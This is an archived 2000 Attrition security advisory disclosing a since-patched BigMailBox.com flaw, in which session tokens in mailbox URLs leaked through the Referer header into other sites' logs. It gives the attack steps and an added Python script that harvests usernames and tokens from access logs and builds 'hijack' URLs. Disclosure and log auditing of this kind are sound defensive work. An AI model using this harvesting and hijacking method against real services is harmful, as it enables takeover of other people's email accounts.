A.L.E.R.T.: BigMailBox.com href tokens leave mailboxes open to

From: Cancer Omega (comegaat_private)
Date: Mon Feb 21 2000 - 13:35:46 PST


    attrition.2000-02-21.bigmailbox                     Thu Feb 10 10:57:57 CST 2000
    Vendor: BigMailBox.com                              Platform: All
                       Attrition's Little Errata Report Team
                            -<)  A . L . E . R . T  (>-
           This advisory reports  a  recently-discovered security issue.
           It may contain a workaround or information on where to obtain
           an appropriate patch.  Advisories should be considered urgent
           as these notices are written only when the likelihood of wide
           impact is determined by the Attrition staff.  An HTML version
           of this and other advisories can be found at Attrition.Org at
      BigMailBox.com href tokens leave mailboxes open to control by a malicious site
    - ---------------------------------------------------------------------------
    - - Users of the BigMailBox.com e-mail service
    - - Users of free e-mail systems hosted by BigMailBox.com for other sites
    - ---------------------------------------------------------------------------
    BigMailBox.com was notified of the problem on Fri, 11 Feb 2000. After
    additional testing and verification, staff of BigMailBox.com patched
    the vulnerability on Mon, 14 Feb 2000.
    - ---------------------------------------------------------------------------
    BigMailBox.com (http://www.bigmailbox.com) offers free Web-based e-mail
    services branded with the customer site's own domain name.  BigMailBox.com
    also offers individual e-mail accounts through the portal site www.gohip.com
    (http://www.gohip.com).
    We were able to find over 100 domains using BigMailBox.com to host their
    e-mail services, including Antionline (http://www.antionline.com), Teen Zone
    (http://www.teenzone.com), Anonymous.to (http://www.anonymous.to), CashPile
    (http://www.cashpile.com), and TeamsterNet (http://www.teamster.net).  As
    can be seen from this list, most of these are smaller portal sites using
    free e-mail to attract repeat traffic.
    - ---------------------------------------------------------------------------
    As we browse the web, client programs such as Netscape and Internet Explorer
    forward a piece of information from one web server to the next whenever a
    hyperlink is followed: the HTTP "Referer" header (called the HREF variable
    throughout this advisory).  It contains the full URL of the page that referred
    the user to the new server, query string included.  When the web visitor
    clicks on a hyperlink, the browser sends this header along with the request,
    and the receiving server records it in its access logs.  Looking at a sample
    entry of an access log (NCSA combined format):
      your.machine.com - - [10/Feb/2000:22:34:30 -0700] "GET /index.html HTTP/1.0"
      200 48797 "http://remote.site.com/" "Mozilla/4.7 [en] (Win98; I)"
    This shows that your.machine.com requested a web page "/index.html" on the
    server, and that you found this link from a web page hosted on
    BigMailBox.com uses a session token to manage access to the mailbox.  This
    session token tells the system that a user is logged in and accessing mail.
    When the user logs out, the session token is automatically expired, forcing
    the user to log in again, which generates a fresh token.  Without a logout,
    the token defaults to expiring one hour after the initial login.
    Unfortunately, the token is carried in the URL of the mailbox pages, so it is
    forwarded to a third-party web site via the HREF variable whenever a link is
    followed from an e-mail message.  With this valid session token, anyone who
    can read that site's logs can get into the BigMailBox.com web e-mail account
    without authenticating.
    Several factors combine to make this a serious problem:
            *  Many systems keep access logs world-readable, so any user on
               the receiving system, not just its administrator, can glean
               the session token from the logs.
            *  Because the URL required to access the mailbox has a fixed,
               predictable format, it is trivial to construct a valid URL
               around a current session token, allowing a third party to
               view the mailbox.
            *  BigMailBox.com's web-based mail client automatically converts
               every URL in a message into a clickable link.
            *  Given the above, a third party can send the user mail
               containing a specific URL, encouraging them to visit a site
               whose logs the attacker can read, where the session token is
               captured.
    1. A potential attacker sends the target a piece of e-mail with a 'bait'
       URL, in hopes of prompting them to follow the link. For example,
       sending mail to victimat_private with a URL for them to visit:
    2. BigMailBox receives the e-mail and converts the URL into a clickable
       hotlink. The victim reads the e-mail and follows the link with a
       single click.
    3. www.myserver.com records the hit to its access_log where the attacker
       is waiting. The attacker views the HREF of the entry:
       Using the HREF, the attacker extracts the e-mail account name designated
       by "un=" (UserName). In the example above: victim
       Looking closely at the end of the HREF, the attacker extracts the last
       field designated by "uid=", which is the current session token. In this
       example, the session token is: BVZkfObYaz4BZUXWkxPz2ZAvt
    4. Using the two fields, the attacker crafts a new URL:
       Putting this into their own browser, they can bypass the login procedure
       and access the web based e-mail account unchallenged.
    From this point, the attacker wields full control over the account
    and may do a number of things:
            * Send mail to anyone as the legitimate user
            * Read and manipulate any mail already received
            * Change the default timeout from one hour to three hours
            * Modify user account information
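    The steps above, as an added example that is not part of the advisory or of
    BigMailBox.com's own software: a parser for NCSA combined-format access-log
    lines that pulls the "un=" and "uid=" fields out of the Referer (HREF) of each
    hit and rebuilds a mailbox URL from them.  The same scan serves either side:
    the attacker waiting on www.myserver.com runs it to harvest tokens, and a site
    operator can run it over their own logs to find out which visitors arrived
    with a live mail session in the Referer.  The log lines are constructed for
    the example (the first one is the advisory's own sample entry); the host
    mail.example.net, the path /cgi-bin/readmail and the "folder=" parameter are
    assumptions, since the advisory's own example URLs are not reproduced in this
    archive copy.

```python
"""Extract leaked BigMailBox-style session tokens from a web server's
access log, as the advisory describes.

Added example code (not from the advisory or from BigMailBox.com). Only
the parameter names "un" and "uid" and the sample token come from the
advisory; the mail host, the path and the "folder" parameter are assumed.
"""
import re
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

# NCSA combined log format:
#   host ident authuser [time] "request" status bytes "referer" "user-agent"
COMBINED_LOG = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample log. Line 1 is the advisory's own example entry; line 2
# is a hit on the attacker's bait page whose Referer carries the victim's
# session; line 3 is a visitor who typed the URL in (no Referer sent).
LOG_SAMPLE = """\
your.machine.com - - [10/Feb/2000:22:34:30 -0700] "GET /index.html HTTP/1.0" 200 48797 "http://remote.site.com/" "Mozilla/4.7 [en] (Win98; I)"
203.0.113.7 - - [10/Feb/2000:22:41:02 -0700] "GET /bait.html HTTP/1.0" 200 1523 "http://mail.example.net/cgi-bin/readmail?un=victim&folder=INBOX&uid=BVZkfObYaz4BZUXWkxPz2ZAvt" "Mozilla/4.7 [en] (Win98; I)"
198.51.100.9 - - [10/Feb/2000:22:42:10 -0700] "GET /bait.html HTTP/1.0" 200 1523 "-" "Mozilla/4.7 [en] (Win98; I)"
"""


def parse_log_line(line):
    """Split one combined-format line into its named fields (None if it
    does not match the format)."""
    m = COMBINED_LOG.match(line.strip())
    return m.groupdict() if m else None


def extract_session(referer):
    """Return (username, token) from a Referer URL that carries the
    "un=" and "uid=" fields, or None when either is absent. A Referer of
    "-" means the browser sent no Referer header at all."""
    if not referer or referer == "-":
        return None
    query = parse_qs(urlsplit(referer).query)
    if "un" not in query or "uid" not in query:
        return None
    return query["un"][0], query["uid"][0]


def find_leaked_sessions(log_text):
    """Scan a whole log and report every hit whose Referer leaked a
    mail session. This is the check a site operator would run over their
    own logs; it is also exactly what the attacker does in step 3."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_log_line(line)
        if entry is None:
            continue
        session = extract_session(entry["referer"])
        if session is None:
            continue
        hits.append({
            "client": entry["host"],
            "time": entry["time"],
            "username": session[0],
            "token": session[1],
            "referer": entry["referer"],
        })
    return hits


def craft_session_url(referer, username, token):
    """Step 4: rebuild a mailbox URL from the leaked Referer's scheme,
    host and path plus just the two fields the advisory names. Anything
    else in the original query string is dropped."""
    parts = urlsplit(referer)
    query = urlencode({"un": username, "uid": token})
    return urlunsplit((parts.scheme, parts.netloc, parts.path, query, ""))


if __name__ == "__main__":
    for hit in find_leaked_sessions(LOG_SAMPLE):
        print("client %(client)s at %(time)s leaked session for %(username)s: "
              "%(token)s" % hit)
        print("  hijack URL:",
              craft_session_url(hit["referer"], hit["username"], hit["token"]))
```

    Note that the third sample line produces no hit: a URL pasted into the
    browser's location bar is not a followed hyperlink, so no Referer is sent,
    which is why the advisory's workaround below works.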
    - ---------------------------------------------------------------------------
    Never click on a URL sent to you via e-mail to any BigMailBox.com e-mail
    account.  Instead, cut and paste the URL into your browser's location bar;
    a URL typed or pasted in is not a followed link, so no HREF is sent.  Log
    out when you are done reading mail, since logging out expires the session
    token immediately instead of leaving it valid for up to an hour.
    Contact BigMailBox and complain about shoddy and insecure e-mail access.
    - ---------------------------------------------------------------------------
    How many times must the security community point out trivial vulnerabilities
    like this? Worse, that 'security' and 'privacy' oriented sites like
    AntiOnline and Anonymous.to would utilize such insecure third party
    servers without testing or auditing them to maintain a reasonable level
    of security.
    - ---------------------------------------------------------------------------
    ADVISORY: Authored by Munge and Jericho
    VULNERABILITY: Found by Mcintyre
    - ---------------------------------------------------------------------------
    Questions regarding this advisory or information regarding new advisories
    and potential vulnerabilities should be directed to ALERT using one of the
    following methods:
    E-Mail: alertat_private
    WWW   : http://www.attrition.org/security/attrition.html
    The ALERT PGP Public Key (PGP v2.6.2, RSA) is available at:

    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:36:33 PDT